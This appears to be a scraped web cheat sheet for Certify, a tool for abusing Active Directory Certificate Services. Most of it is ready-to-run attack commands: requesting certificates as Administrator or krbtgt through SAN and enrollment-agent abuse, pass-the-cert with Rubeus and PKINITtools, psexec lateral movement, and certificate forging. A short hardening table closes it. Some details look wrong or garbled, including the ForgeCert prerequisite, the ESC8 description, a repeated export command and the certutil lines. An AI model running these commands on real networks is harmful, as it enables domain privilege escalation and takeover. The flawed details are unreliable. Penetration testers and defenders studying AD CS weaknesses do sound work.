Certify
Certify is a .NET tool for enumerating and abusing Active Directory Certificate Services (AD CS) to identify vulnerable certificate templates and misconfigured certification authorities for privilege escalation and lateral movement.
Installation
섹션 제목: “Installation”Compile from Source
섹션 제목: “Compile from Source”Clone the GhostPack repository and compile with Visual Studio:
git clone https://github.com/GhostPack/Certify.git
cd Certify
# Open Certify.sln in Visual Studio 2019/2022
# Build > Build Solution (Release x64)
# Output: Certify.exe in bin/Release/Precompiled Releases
섹션 제목: “Precompiled Releases”Download precompiled binaries from the GitHub releases page:
# Extract and execute directly
.\Certify.exe find /vulnerableExecute-Assembly in Cobalt Strike
섹션 제목: “Execute-Assembly in Cobalt Strike”Load Certify as a .NET assembly in Cobalt Strike for in-memory execution:
beacon> execute-assembly /path/to/Certify.exe find /vulnerableQuick Start
섹션 제목: “Quick Start”Find Vulnerable Templates
섹션 제목: “Find Vulnerable Templates”# Enumerate all templates and identify those with known vulnerabilities (ESC1-ESC8)
Certify.exe find /vulnerableEnumerate All CAs
섹션 제목: “Enumerate All CAs”# List all certification authorities in the domain
Certify.exe casEnumerate All Templates
섹션 제목: “Enumerate All Templates”# Display all certificate templates available for enrollment
Certify.exe findEnumeration
섹션 제목: “Enumeration”Enumerate Certification Authorities
섹션 제목: “Enumerate Certification Authorities”# List all CAs with detailed information
Certify.exe cas
# Output includes:
# - CA Name
# - DN (Distinguished Name)
# - Certificate Subject
# - Web Enrollment supportEnumerate Certificate Templates
섹션 제목: “Enumerate Certificate Templates”# List all available templates with enrollment requirements
Certify.exe find
# Displays:
# - Template Name
# - EKU (Extended Key Usage)
# - Enrollment Rights
# - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag
# - Manager Approval requirement
# - Authorized SignaturesFind Vulnerable Templates
섹션 제목: “Find Vulnerable Templates”# Identify templates vulnerable to ESC1-ESC8 attacks
Certify.exe find /vulnerable
# Highlights potentially exploitable misconfigurationsFilter by Template Purpose
섹션 제목: “Filter by Template Purpose”# Find templates allowing client authentication (ESC1/ESC3)
Certify.exe find /clientauth
# Find templates where enrollee supplies subject (ESC1)
Certify.exe find /enrolleeSuppliesSubjectEnumerate PKI Objects and Permissions
섹션 제목: “Enumerate PKI Objects and Permissions”# Display detailed PKI object information including permissions
Certify.exe pkiobjects
# Shows CA access control lists and enrollment agent permissionsCertificate Request
섹션 제목: “Certificate Request”Basic Certificate Request
섹션 제목: “Basic Certificate Request”# Request certificate from specific CA using target template
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:UserSubject Alternative Name (SAN) Abuse
섹션 제목: “Subject Alternative Name (SAN) Abuse”# Add alternate principal name (ESC1 exploitation)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /altname:Administrator
# Common targets for SAN abuse:
# /altname:Administrator # Domain admin user
# /altname:DOMAIN\Administrator # Fully qualified name
# /altname:krbtgt # KDC accountOn-Behalf-Of Enrollment
섹션 제목: “On-Behalf-Of Enrollment”# Request certificate on behalf of another user (enrollment agent abuse)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /onbehalfof:DOMAIN\AdministratorInstall Certificate After Request
섹션 제목: “Install Certificate After Request”# Install generated certificate in current user's personal store
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install
# Certificate stored in:
# Cert:\CurrentUser\My\[Thumbprint]Export Certificate to File
섹션 제목: “Export Certificate to File”# Request and output certificate/key to PFX (contains private key)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install
# Retrieve from certificate store and export with openssl
# (See Integration section)Vulnerable Template Identification
섹션 제목: “Vulnerable Template Identification”ESC1: Unrestricted Enrollment + SAN Abuse
섹션 제목: “ESC1: Unrestricted Enrollment + SAN Abuse”Conditions:
- Template allows any principal to enroll
- Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set)
- EKU includes client authentication
- Manager approval not required
Certify identifies: [!] Enrollee supplies subject
Exploitation: Request cert with /altname:Administrator and use for authentication.
ESC2: Certificate Template Abuse (General Abuse)
섹션 제목: “ESC2: Certificate Template Abuse (General Abuse)”Conditions:
- Any EKU allows any purpose
- Enrollee supplies subject enabled
- No manager approval
Certify identifies: [!] ANY_PURPOSE EKU
Exploitation: Request cert for arbitrary use cases (authentication, signing, encryption).
ESC3: Enrollment Agent Abuse
섹션 제목: “ESC3: Enrollment Agent Abuse”Conditions:
- Enrollment Agent template allows unrestricted enrollment
- Any principal can request as another user
- Target user’s template allows enrollment
Certify identifies: [!] Enrollment Agent template + enrollment rights mismatch
Exploitation: Use /onbehalfof to request certs for high-privilege users.
ESC4: Misconfigured Certificate Template Permissions
섹션 제목: “ESC4: Misconfigured Certificate Template Permissions”Conditions:
- Low-privileged user has ModifyTemplate rights
- Can modify template settings to create vulnerability
- Change EKU, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, permissions
Certify identifies: Template permissions via pkiobjects
Exploitation: Modify template then request exploitable certificate.
ESC5: Vulnerable PKI Object Permissions
섹션 제목: “ESC5: Vulnerable PKI Object Permissions”Conditions:
- Low-privileged user has dangerous permissions over CA/templates
- FullControl, Write, WriteDacl on PKI objects
- Can modify CA configuration or template settings
Certify identifies: via pkiobjects + low-priv user with ACE
Exploitation: Modify template CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or CA settings.
ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag
섹션 제목: “ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag”Conditions:
- CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
- Allows client-supplied SubjectAltName in requests
- Default template allows any user to request
Certify identifies: [!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
Exploitation: Request cert with arbitrary SAN on any template.
ESC7: Vulnerable CA Access Control
섹션 제목: “ESC7: Vulnerable CA Access Control”Conditions:
- Low-privileged user has dangerous permissions (Manage Certificates, etc.)
- Can approve/deny pending requests
- Can configure CA settings
Certify identifies: via pkiobjects + ACL review
Exploitation: Approve own requests, modify CA configuration.
ESC8: Web Enrollment Enabled
섹션 제목: “ESC8: Web Enrollment Enabled”Conditions:
- CA has web enrollment service enabled
- Accessible without authentication or with weak auth
- No request validation
Certify identifies: [+] Web Enrollment Enabled
Exploitation: Submit request directly via HTTP without strong auth.
CA Enumeration Details
섹션 제목: “CA Enumeration Details”CA Permissions and Access Control
섹션 제목: “CA Permissions and Access Control”# Review CA access control lists
Certify.exe pkiobjects
# Look for:
# - Low-privileged users with "Manage Certificates"
# - Non-admin users with CA access
# - Enrollment agent permissionsEDITF Flags
섹션 제목: “EDITF Flags”# CA with EDITF_ATTRIBUTESUBJECTALTNAME2 allows client-supplied SANs
# This creates ESC6 vulnerability if any template allows unrestricted enrollment
Certify.exe cas
# Look for "[!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled"Web Enrollment Endpoints
섹션 제목: “Web Enrollment Endpoints”# Check for enabled web enrollment service
Certify.exe cas
# Web enrollment typically hosted at:
# http://CA-SERVER/certsrv/
# https://CA-SERVER/certsrv/
# Request certificate via HTTP POST if authentication is weak/missingTemplate Analysis
섹션 제목: “Template Analysis”Understanding Certify Output
섹션 제목: “Understanding Certify Output”[+] Template Name: User
[+] Template Schema Version: 2
[+] Display Name: User
[+] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com
[+] Enrollment Rights:
Authenticated Users - Full (2032)
[+] EKU: Client Authentication, Email Protection
[+] Enrollee Supplies Subject: True
[+] Manager Approval: False
[+] Requires Authorized Signatures: 0
[+] Authorized Signatures:
[+] CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: TrueKey Fields
섹션 제목: “Key Fields”| Field | Meaning |
|---|---|
| Enrollee Supplies Subject | User can specify certificate subject/SAN |
| CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT | Certificate template flag enabling above |
| EKU | Extended Key Usage (Client Auth, Server Auth, Code Signing, etc.) |
| Enrollment Rights | Which principals can request from this template |
| Manager Approval | Requires CA manager to approve request |
| Authorized Signatures | Number of authorized signatures required |
| ANY_PURPOSE | Dangerous EKU allowing any usage |
Dangerous Configurations
섹션 제목: “Dangerous Configurations”[!] Enrollee supplies subject
[!] Any principal can enroll
[!] Client Authentication EKU present
[!] Manager Approval: False
[!] Authorized Signatures: 0
# All together = ESC1 vulnerabilityCertificate Installation and Usage
섹션 제목: “Certificate Installation and Usage”Export Certificate to PFX
섹션 제목: “Export Certificate to PFX”# From certificate store to file
$cert = Get-ChildItem Cert:\CurrentUser\My\[Thumbprint]
$password = ConvertTo-SecureString -String "password" -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath cert.pfx -Password $passwordConvert PFX to Rubeus Format
섹션 제목: “Convert PFX to Rubeus Format”# Install openssl or use WSL
openssl pkcs12 -in cert.pfx -out cert.pem -nodes -passin pass:password
# Load into Rubeus for Kerberos authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pem /createnetonly:C:\Windows\System32\cmd.exePass-the-Cert Attack
섹션 제목: “Pass-the-Cert Attack”# Use certificate for authentication without plaintext password
# Via Rubeus PKINIT
Rubeus.exe asktgt /user:Administrator /certificate:C:\path\to\cert.pfx /password:certpassword /createnetonly:C:\Windows\System32\cmd.exe
# Spawns process with TGT for Administrator
# Use for lateral movement and persistencePKINIT and Kerberos
섹션 제목: “PKINIT and Kerberos”# PKINITtools - Kerberos authentication via certificate
# Requires certificate with Client Authentication EKU
# Request TGT using certificate identity
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass password domain.com\\Administrator administrator.ccache
# Use ccache for lateral movement
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGETTroubleshooting
섹션 제목: “Troubleshooting””Access Denied” During Enumeration
섹션 제목: “”Access Denied” During Enumeration”# Running as non-domain-joined user or unauthenticated
# Ensure domain connectivity and valid credentials
# Run as domain user:
runas /user:DOMAIN\username cmd.exe
# Then execute Certify.exeNo Vulnerable Templates Found
섹션 제목: “No Vulnerable Templates Found”# May indicate:
# 1. Templates properly secured (no ESC conditions)
# 2. Organization hardened against ADCS attacks
# 3. Limited template visibility for current user
# Review all templates regardless:
Certify.exe find
# Manually analyze based on ESC conditions aboveCertificate Request Denied
섹션 제목: “Certificate Request Denied”# Reasons:
# - Insufficient enrollment rights
# - Template requires manager approval (pending request)
# - CA configured to deny certain principals
# Check enrollment rights:
Certify.exe find /template:TemplateName
# Review "Enrollment Rights" outputWeb Enrollment 404 or Unavailable
섹션 제목: “Web Enrollment 404 or Unavailable”# CA web enrollment service not running or disabled
# Fallback to direct CA RPC interface
# Certify uses RPC by default, web enrollment is optional
# Check CA configuration for enabled servicesBest Practices
섹션 제목: “Best Practices”| Practice | Description |
|---|---|
| Review All Templates | Run Certify.exe find and manually review against ESC conditions |
| Monitor Enrollments | Track certificate requests on CAs for suspicious activity |
| Restrict SAN Abuse | Disable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on sensitive templates |
| Enforce Approvals | Require manager approval for privileged templates |
| Limit Enrollment Rights | Restrict principals able to enroll (not Authenticated Users) |
| Disable EDITF Flags | Review and remove unnecessary EDITF_* flags on CAs |
| RBAC on PKI Objects | Limit template modification and CA access to admins |
| Certificate Auditing | Monitor issued certificates for anomalies |
| EKU Restrictions | Use specific EKUs (not ANY_PURPOSE) |
Related Tools
섹션 제목: “Related Tools”Certipy (Python)
섹션 제목: “Certipy (Python)”# Python ADCS enumeration and exploitation
certipy find -u user@domain.com -p password -dc-ip 10.0.0.1
certipy req -u user@domain.com -p password -ca CA-NAME -template UserForgeCert
섹션 제목: “ForgeCert”# Forge certificates without CA interaction
# Requires NTLM hash of CA account
ForgeCert.exe --CaCert ca-cert.cer --CaKey ca-key.key --Subject CN=AdministratorRubeus
섹션 제목: “Rubeus”# Kerberos manipulation and PKINIT authentication
# Integrated with certificate-based authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfxPKINITtools
섹션 제목: “PKINITtools”# Kerberos PKINIT support and certificate-based auth
# Cross-platform (Python/Linux)
getTGT.py -cert-pfx cert.pfx DOMAIN/AdministratorCertutil (Native Windows)
섹션 제목: “Certutil (Native Windows)”# Native Windows utility for certificate operations
certutil -config CA-NAME -ca.cert ca-cert.cer
# Request certificate directly
certutil -ca.cert -crl